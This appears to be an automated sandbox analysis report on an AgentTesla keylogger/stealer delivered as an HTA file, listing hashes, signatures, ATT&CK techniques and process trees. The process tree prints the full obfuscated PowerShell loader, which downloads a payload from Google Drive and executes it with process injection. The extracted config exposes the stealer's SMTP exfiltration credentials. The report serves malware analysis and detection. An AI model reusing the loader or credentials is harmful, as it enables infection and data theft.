agenttesla | 17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32

General

Target

17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta
Size

5KB
MD5

3ef5759d457c58dc4c8c9b6c15aca5fe
SHA1

be35dffec6716bfe6ece66f7e140b8df97d5b994
SHA256

17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32
SHA512

c6b8c4452b774cd782b75891048ca0aacf1ffd0af55536e0d3a7643b6821b46004225b47bc4fbc81fd95c5f6f6aa0eb6dc34f659d0654b29a05b521c431b45e8
SSDEEP

96:buOGiiV+5y/gkgBONHwBB9HaXa3U+1hTIbtu7ZEhtNsim57V+ICgCtUfkX:ypD/gkgywP9HaKk+rTIBeuhtNN2CLtUY

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.bunturaja.co.id
Port:
587
Username:
[email protected]
Password:
!@#$%,.Jakarta
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

3 2704 powershell.exe
5 2704 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

2 drive.google.com
3 drive.google.com
8 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 api.ipify.org
13 api.ipify.org
14 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2672 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2508 powershell.exe
2672 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2508 set thread context of 2672 2508 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2704 powershell.exe
2508 powershell.exe
2508 powershell.exe
2672 wab.exe
2672 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2508 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2704 powershell.exe
Token: SeDebugPrivilege 2508 powershell.exe
Token: SeDebugPrivilege 2672 wab.exe

flow	pid	process
3	2704	powershell.exe
5	2704	powershell.exe

flow	ioc
2	drive.google.com
3	drive.google.com
8	drive.google.com

flow	ioc
12	api.ipify.org
13	api.ipify.org
14	ip-api.com

pid	process
2672	wab.exe

pid	process
2508	powershell.exe
2672	wab.exe

description	pid	process	target process
PID 2508 set thread context of 2672	2508	powershell.exe	wab.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2704	powershell.exe
2508	powershell.exe
2508	powershell.exe
2672	wab.exe
2672	wab.exe

pid	process
2508	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2672	wab.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

mshta.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1280 wrote to memory of 2704	1280	mshta.exe	powershell.exe
PID 1280 wrote to memory of 2704	1280	mshta.exe	powershell.exe
PID 1280 wrote to memory of 2704	1280	mshta.exe	powershell.exe
PID 1280 wrote to memory of 2704	1280	mshta.exe	powershell.exe
PID 2704 wrote to memory of 2212	2704	powershell.exe	cmd.exe
PID 2704 wrote to memory of 2212	2704	powershell.exe	cmd.exe
PID 2704 wrote to memory of 2212	2704	powershell.exe	cmd.exe
PID 2704 wrote to memory of 2212	2704	powershell.exe	cmd.exe
PID 2704 wrote to memory of 2508	2704	powershell.exe	powershell.exe
PID 2704 wrote to memory of 2508	2704	powershell.exe	powershell.exe
PID 2704 wrote to memory of 2508	2704	powershell.exe	powershell.exe
PID 2704 wrote to memory of 2508	2704	powershell.exe	powershell.exe
PID 2508 wrote to memory of 2200	2508	powershell.exe	cmd.exe
PID 2508 wrote to memory of 2200	2508	powershell.exe	cmd.exe
PID 2508 wrote to memory of 2200	2508	powershell.exe	cmd.exe
PID 2508 wrote to memory of 2200	2508	powershell.exe	cmd.exe
PID 2508 wrote to memory of 2672	2508	powershell.exe	wab.exe
PID 2508 wrote to memory of 2672	2508	powershell.exe	wab.exe
PID 2508 wrote to memory of 2672	2508	powershell.exe	wab.exe
PID 2508 wrote to memory of 2672	2508	powershell.exe	wab.exe
PID 2508 wrote to memory of 2672	2508	powershell.exe	wab.exe
PID 2508 wrote to memory of 2672	2508	powershell.exe	wab.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. /Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"
3⤵
PID:2212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. /Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"
4⤵
PID:2200

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Fdegodserne.Con
Filesize
492KB

MD5
1fe03ff02fd5bae7e909af7c3471a4c7

SHA1
cb1bb668c0e0191b63d7aac5ecd4117b8d05647e

SHA256
b9aa136cd82e7b1c7381598d12be3297722ef09c005344168594fc5a1ed1414b

SHA512
83d9a6c8de897c7d98b30117f7a94bd1048e33cd47961d75fd6ac0c7cf870ad6949265485b91a899f81fd5a0fca03a295281c4a6e46f29034b1db11b61e9696d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
948af304322d6a545c8161e8d0ed7d3c

SHA1
de376e784a3eee65dbdd0a226b9a2fb68e04b200

SHA256
60eba1d326349c7e7e90a3f15d65308023cfadcfb0d1178b266b517798d6ed94

SHA512
e416401d76fff54f6e2914dc4337003cbfefcdbf325b5f76564284cc7d5a47b13ce40fa060bbc8833dfcc4cbb5d5d660b62fb3824a116cb6e08c2c4752b23361

Download Submit
memory/2508-15-0x0000000006630000-0x000000000A4A2000-memory.dmp

Filesize
62.4MB

Download
memory/2672-39-0x0000000000FA0000-0x0000000002002000-memory.dmp

Filesize
16.4MB

Download
memory/2672-41-0x0000000000FA0000-0x0000000000FE2000-memory.dmp

Filesize
264KB

Download

Analysis

Sharing